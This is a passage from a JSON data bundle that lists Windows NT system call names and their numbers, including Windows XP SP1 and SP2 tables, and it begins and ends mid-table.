\"NtAlpcCreateSectionView\": \"126\", \"NtAlpcCreateSecurityContext\": \"127\", \"NtAlpcDeletePortSection\": \"128\", \"NtAlpcDeleteResourceReserve\": \"129\", \"NtAlpcDeleteSectionView\": \"130\", \"NtAlpcDeleteSecurityContext\": \"131\", \"NtAlpcDisconnectPort\": \"132\", \"NtAlpcImpersonateClientContainerOfPort\": \"133\", \"NtAlpcImpersonateClientOfPort\": \"134\", \"NtAlpcOpenSenderProcess\": \"135\", \"NtAlpcOpenSenderThread\": \"136\", \"NtAlpcQueryInformation\": \"137\", \"NtAlpcQueryInformationMessage\": \"138\", \"NtAlpcRevokeSecurityContext\": \"139\", \"NtAlpcSendWaitReceivePort\": \"140\", \"NtAlpcSetInformation\": \"141\", \"NtAreMappedFilesTheSame\": \"142\", \"NtAssignProcessToJobObject\": \"143\", \"NtAssociateWaitCompletionPacket\": \"144\", \"NtCallEnclave\": \"145\", \"NtCancelIoFileEx\": \"146\", \"NtCancelSynchronousIoFile\": \"147\", \"NtCancelTimer2\": \"148\", \"NtCancelWaitCompletionPacket\": \"149\", \"NtCommitComplete\": \"150\", \"NtCommitEnlistment\": \"151\", \"NtCommitRegistryTransaction\": \"152\", \"NtCommitTransaction\": \"153\", \"NtCompactKeys\": \"154\", \"NtCompareObjects\": \"155\", \"NtCompareSigningLevels\": \"156\", \"NtCompareTokens\": \"157\", \"NtCompleteConnectPort\": \"158\", \"NtCompressKey\": \"159\", \"NtConnectPort\": \"160\", \"NtContinueEx\": \"161\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"162\", \"NtCreateCrossVmEvent\": \"163\", \"NtCreateCrossVmMutant\": \"164\", \"NtCreateDebugObject\": \"165\", \"NtCreateDirectoryObject\": \"166\", \"NtCreateDirectoryObjectEx\": \"167\", \"NtCreateEnclave\": \"168\", \"NtCreateEnlistment\": \"169\", \"NtCreateEventPair\": \"170\", \"NtCreateIRTimer\": \"171\", \"NtCreateIoCompletion\": \"172\", \"NtCreateJobObject\": \"173\", \"NtCreateJobSet\": \"174\", \"NtCreateKeyTransacted\": \"175\", \"NtCreateKeyedEvent\": \"176\", \"NtCreateLowBoxToken\": \"177\", \"NtCreateMailslotFile\": \"178\", \"NtCreateMutant\": \"179\", \"NtCreateNamedPipeFile\": \"180\", \"NtCreatePagingFile\": \"181\", \"NtCreatePartition\": \"182\", \"NtCreatePort\": \"183\", \"NtCreatePrivateNamespace\": \"184\", \"NtCreateProcess\": \"185\", \"NtCreateProfile\": \"186\", \"NtCreateProfileEx\": \"187\", \"NtCreateRegistryTransaction\": \"188\", \"NtCreateResourceManager\": \"189\", \"NtCreateSectionEx\": \"190\", \"NtCreateSemaphore\": \"191\", \"NtCreateSymbolicLinkObject\": \"192\", \"NtCreateThreadEx\": \"193\", \"NtCreateTimer\": \"194\", \"NtCreateTimer2\": \"195\", \"NtCreateToken\": \"196\", \"NtCreateTokenEx\": \"197\", \"NtCreateTransaction\": \"198\", \"NtCreateTransactionManager\": \"199\", \"NtCreateUserProcess\": \"200\", \"NtCreateWaitCompletionPacket\": \"201\", \"NtCreateWaitablePort\": \"202\", \"NtCreateWnfStateName\": \"203\", \"NtCreateWorkerFactory\": \"204\", \"NtDebugActiveProcess\": \"205\", \"NtDebugContinue\": \"206\", \"NtDeleteAtom\": \"207\", \"NtDeleteBootEntry\": \"208\", \"NtDeleteDriverEntry\": \"209\", \"NtDeleteFile\": \"210\", \"NtDeleteKey\": \"211\", \"NtDeleteObjectAuditAlarm\": \"212\", \"NtDeletePrivateNamespace\": \"213\", \"NtDeleteValueKey\": \"214\", \"NtDeleteWnfStateData\": \"215\", \"NtDeleteWnfStateName\": \"216\", \"NtDirectGraphicsCall\": \"217\", \"NtDisableLastKnownGood\": \"218\", \"NtDisplayString\": \"219\", \"NtDrawText\": \"220\", \"NtEnableLastKnownGood\": \"221\", \"NtEnumerateBootEntries\": \"222\", \"NtEnumerateDriverEntries\": \"223\", \"NtEnumerateSystemEnvironmentValuesEx\": \"224\", \"NtEnumerateTransactionObject\": \"225\", \"NtExtendSection\": \"226\", \"NtFilterBootOption\": \"227\", \"NtFilterToken\": \"228\", \"NtFilterTokenEx\": \"229\", \"NtFlushBuffersFileEx\": \"230\", \"NtFlushInstallUILanguage\": \"231\", \"NtFlushInstructionCache\": \"232\", \"NtFlushKey\": \"233\", \"NtFlushProcessWriteBuffers\": \"234\", \"NtFlushVirtualMemory\": \"235\", \"NtFlushWriteBuffer\": \"236\", \"NtFreeUserPhysicalPages\": \"237\", \"NtFreezeRegistry\": \"238\", \"NtFreezeTransactions\": \"239\", \"NtGetCachedSigningLevel\": \"240\", \"NtGetCompleteWnfStateSubscription\": \"241\", \"NtGetContextThread\": \"242\", \"NtGetCurrentProcessorNumber\": \"243\", \"NtGetCurrentProcessorNumberEx\": \"244\", \"NtGetDevicePowerState\": \"245\", \"NtGetMUIRegistryInfo\": \"246\", \"NtGetNextProcess\": \"247\", \"NtGetNextThread\": \"248\", \"NtGetNlsSectionPtr\": \"249\", \"NtGetNotificationResourceManager\": \"250\", \"NtGetWriteWatch\": \"251\", \"NtImpersonateAnonymousToken\": \"252\", \"NtImpersonateThread\": \"253\", \"NtInitializeEnclave\": \"254\", \"NtInitializeNlsFiles\": \"255\", \"NtInitializeRegistry\": \"256\", \"NtInitiatePowerAction\": \"257\", \"NtIsSystemResumeAutomatic\": \"258\", \"NtIsUILanguageComitted\": \"259\", \"NtListenPort\": \"260\", \"NtLoadDriver\": \"261\", \"NtLoadEnclaveData\": \"262\", \"NtLoadKey\": \"263\", \"NtLoadKey2\": \"264\", \"NtLoadKeyEx\": \"265\", \"NtLockFile\": \"266\", \"NtLockProductActivationKeys\": \"267\", \"NtLockRegistryKey\": \"268\", \"NtLockVirtualMemory\": \"269\", \"NtMakePermanentObject\": \"270\", \"NtMakeTemporaryObject\": \"271\", \"NtManageHotPatch\": \"272\", \"NtManagePartition\": \"273\", \"NtMapCMFModule\": \"274\", \"NtMapUserPhysicalPages\": \"275\", \"NtMapViewOfSectionEx\": \"276\", \"NtModifyBootEntry\": \"277\", \"NtModifyDriverEntry\": \"278\", \"NtNotifyChangeDirectoryFile\": \"279\", \"NtNotifyChangeDirectoryFileEx\": \"280\", \"NtNotifyChangeKey\": \"281\", \"NtNotifyChangeMultipleKeys\": \"282\", \"NtNotifyChangeSession\": \"283\", \"NtOpenEnlistment\": \"284\", \"NtOpenEventPair\": \"285\", \"NtOpenIoCompletion\": \"286\", \"NtOpenJobObject\": \"287\", \"NtOpenKeyEx\": \"288\", \"NtOpenKeyTransacted\": \"289\", \"NtOpenKeyTransactedEx\": \"290\", \"NtOpenKeyedEvent\": \"291\", \"NtOpenMutant\": \"292\", \"NtOpenObjectAuditAlarm\": \"293\", \"NtOpenPartition\": \"294\", \"NtOpenPrivateNamespace\": \"295\", \"NtOpenProcessToken\": \"296\", \"NtOpenRegistryTransaction\": \"297\", \"NtOpenResourceManager\": \"298\", \"NtOpenSemaphore\": \"299\", \"NtOpenSession\": \"300\", \"NtOpenSymbolicLinkObject\": \"301\", \"NtOpenThread\": \"302\", \"NtOpenTimer\": \"303\", \"NtOpenTransaction\": \"304\", \"NtOpenTransactionManager\": \"305\", \"NtPlugPlayControl\": \"306\", \"NtPrePrepareComplete\": \"307\", \"NtPrePrepareEnlistment\": \"308\", \"NtPrepareComplete\": \"309\", \"NtPrepareEnlistment\": \"310\", \"NtPrivilegeCheck\": \"311\", \"NtPrivilegeObjectAuditAlarm\": \"312\", \"NtPrivilegedServiceAuditAlarm\": \"313\", \"NtPropagationComplete\": \"314\", \"NtPropagationFailed\": \"315\", \"NtPssCaptureVaSpaceBulk\": \"316\", \"NtPulseEvent\": \"317\", \"NtQueryAuxiliaryCounterFrequency\": \"318\", \"NtQueryBootEntryOrder\": \"319\", \"NtQueryBootOptions\": \"320\", \"NtQueryDebugFilterState\": \"321\", \"NtQueryDirectoryFileEx\": \"322\", \"NtQueryDirectoryObject\": \"323\", \"NtQueryDriverEntryOrder\": \"324\", \"NtQueryEaFile\": \"325\", \"NtQueryFullAttributesFile\": \"326\", \"NtQueryInformationAtom\": \"327\", \"NtQueryInformationByName\": \"328\", \"NtQueryInformationEnlistment\": \"329\", \"NtQueryInformationJobObject\": \"330\", \"NtQueryInformationPort\": \"331\", \"NtQueryInformationResourceManager\": \"332\", \"NtQueryInformationTransaction\": \"333\", \"NtQueryInformationTransactionManager\": \"334\", \"NtQueryInformationWorkerFactory\": \"335\", \"NtQueryInstallUILanguage\": \"336\", \"NtQueryIntervalProfile\": \"337\", \"NtQueryIoCompletion\": \"338\", \"NtQueryLicenseValue\": \"339\", \"NtQueryMultipleValueKey\": \"340\", \"NtQueryMutant\": \"341\", \"NtQueryOpenSubKeys\": \"342\", \"NtQueryOpenSubKeysEx\": \"343\", \"NtQueryPortInformationProcess\": \"344\", \"NtQueryQuotaInformationFile\": \"345\", \"NtQuerySecurityAttributesToken\": \"346\", \"NtQuerySecurityObject\": \"347\", \"NtQuerySecurityPolicy\": \"348\", \"NtQuerySemaphore\": \"349\", \"NtQuerySymbolicLinkObject\": \"350\", \"NtQuerySystemEnvironmentValue\": \"351\", \"NtQuerySystemEnvironmentValueEx\": \"352\", \"NtQuerySystemInformationEx\": \"353\", \"NtQueryTimerResolution\": \"354\", \"NtQueryWnfStateData\": \"355\", \"NtQueryWnfStateNameInformation\": \"356\", \"NtQueueApcThreadEx\": \"357\", \"NtRaiseException\": \"358\", \"NtRaiseHardError\": \"359\", \"NtReadOnlyEnlistment\": \"360\", \"NtRecoverEnlistment\": \"361\", \"NtRecoverResourceManager\": \"362\", \"NtRecoverTransactionManager\": \"363\", \"NtRegisterProtocolAddressInformation\": \"364\", \"NtRegisterThreadTerminatePort\": \"365\", \"NtReleaseKeyedEvent\": \"366\", \"NtReleaseWorkerFactoryWorker\": \"367\", \"NtRemoveIoCompletionEx\": \"368\", \"NtRemoveProcessDebug\": \"369\", \"NtRenameKey\": \"370\", \"NtRenameTransactionManager\": \"371\", \"NtReplaceKey\": \"372\", \"NtReplacePartitionUnit\": \"373\", \"NtReplyWaitReplyPort\": \"374\", \"NtRequestPort\": \"375\", \"NtResetEvent\": \"376\", \"NtResetWriteWatch\": \"377\", \"NtRestoreKey\": \"378\", \"NtResumeProcess\": \"379\", \"NtRevertContainerImpersonation\": \"380\", \"NtRollbackComplete\": \"381\", \"NtRollbackEnlistment\": \"382\", \"NtRollbackRegistryTransaction\": \"383\", \"NtRollbackTransaction\": \"384\", \"NtRollforwardTransactionManager\": \"385\", \"NtSaveKey\": \"386\", \"NtSaveKeyEx\": \"387\", \"NtSaveMergedKeys\": \"388\", \"NtSecureConnectPort\": \"389\", \"NtSerializeBoot\": \"390\", \"NtSetBootEntryOrder\": \"391\", \"NtSetBootOptions\": \"392\", \"NtSetCachedSigningLevel\": \"393\", \"NtSetCachedSigningLevel2\": \"394\", \"NtSetContextThread\": \"395\", \"NtSetDebugFilterState\": \"396\", \"NtSetDefaultHardErrorPort\": \"397\", \"NtSetDefaultLocale\": \"398\", \"NtSetDefaultUILanguage\": \"399\", \"NtSetDriverEntryOrder\": \"400\", \"NtSetEaFile\": \"401\", \"NtSetHighEventPair\": \"402\", \"NtSetHighWaitLowEventPair\": \"403\", \"NtSetIRTimer\": \"404\", \"NtSetInformationDebugObject\": \"405\", \"NtSetInformationEnlistment\": \"406\", \"NtSetInformationJobObject\": \"407\", \"NtSetInformationKey\": \"408\", \"NtSetInformationResourceManager\": \"409\", \"NtSetInformationSymbolicLink\": \"410\", \"NtSetInformationToken\": \"411\", \"NtSetInformationTransaction\": \"412\", \"NtSetInformationTransactionManager\": \"413\", \"NtSetInformationVirtualMemory\": \"414\", \"NtSetInformationWorkerFactory\": \"415\", \"NtSetIntervalProfile\": \"416\", \"NtSetIoCompletion\": \"417\", \"NtSetIoCompletionEx\": \"418\", \"NtSetLdtEntries\": \"419\", \"NtSetLowEventPair\": \"420\", \"NtSetLowWaitHighEventPair\": \"421\", \"NtSetQuotaInformationFile\": \"422\", \"NtSetSecurityObject\": \"423\", \"NtSetSystemEnvironmentValue\": \"424\", \"NtSetSystemEnvironmentValueEx\": \"425\", \"NtSetSystemInformation\": \"426\", \"NtSetSystemPowerState\": \"427\", \"NtSetSystemTime\": \"428\", \"NtSetThreadExecutionState\": \"429\", \"NtSetTimer2\": \"430\", \"NtSetTimerEx\": \"431\", \"NtSetTimerResolution\": \"432\", \"NtSetUuidSeed\": \"433\", \"NtSetVolumeInformationFile\": \"434\", \"NtSetWnfProcessNotificationEvent\": \"435\", \"NtShutdownSystem\": \"436\", \"NtShutdownWorkerFactory\": \"437\", \"NtSignalAndWaitForSingleObject\": \"438\", \"NtSinglePhaseReject\": \"439\", \"NtStartProfile\": \"440\", \"NtStopProfile\": \"441\", \"NtSubscribeWnfStateChange\": \"442\", \"NtSuspendProcess\": \"443\", \"NtSuspendThread\": \"444\", \"NtSystemDebugControl\": \"445\", \"NtTerminateEnclave\": \"446\", \"NtTerminateJobObject\": \"447\", \"NtTestAlert\": \"448\", \"NtThawRegistry\": \"449\", \"NtThawTransactions\": \"450\", \"NtTraceControl\": \"451\", \"NtTranslateFilePath\": \"452\", \"NtUmsThreadYield\": \"453\", \"NtUnloadDriver\": \"454\", \"NtUnloadKey\": \"455\", \"NtUnloadKey2\": \"456\", \"NtUnloadKeyEx\": \"457\", \"NtUnlockFile\": \"458\", \"NtUnlockVirtualMemory\": \"459\", \"NtUnmapViewOfSectionEx\": \"460\", \"NtUnsubscribeWnfStateChange\": \"461\", \"NtUpdateWnfStateData\": \"462\", \"NtVdmControl\": \"463\", \"NtWaitForAlertByThreadId\": \"464\", \"NtWaitForDebugEvent\": \"465\", \"NtWaitForKeyedEvent\": \"466\", \"NtWaitForWorkViaWorkerFactory\": \"467\", \"NtWaitHighEventPair\": \"468\", \"NtWaitLowEventPair\": \"469\", \"NtLoadKey3\": \"470\"}}}\r\n" }, { "path": "start/reverseWinSyscallsInt.json", "content": "{\"Windows XP\": {\"SP1\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, \"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, \"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, \"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, 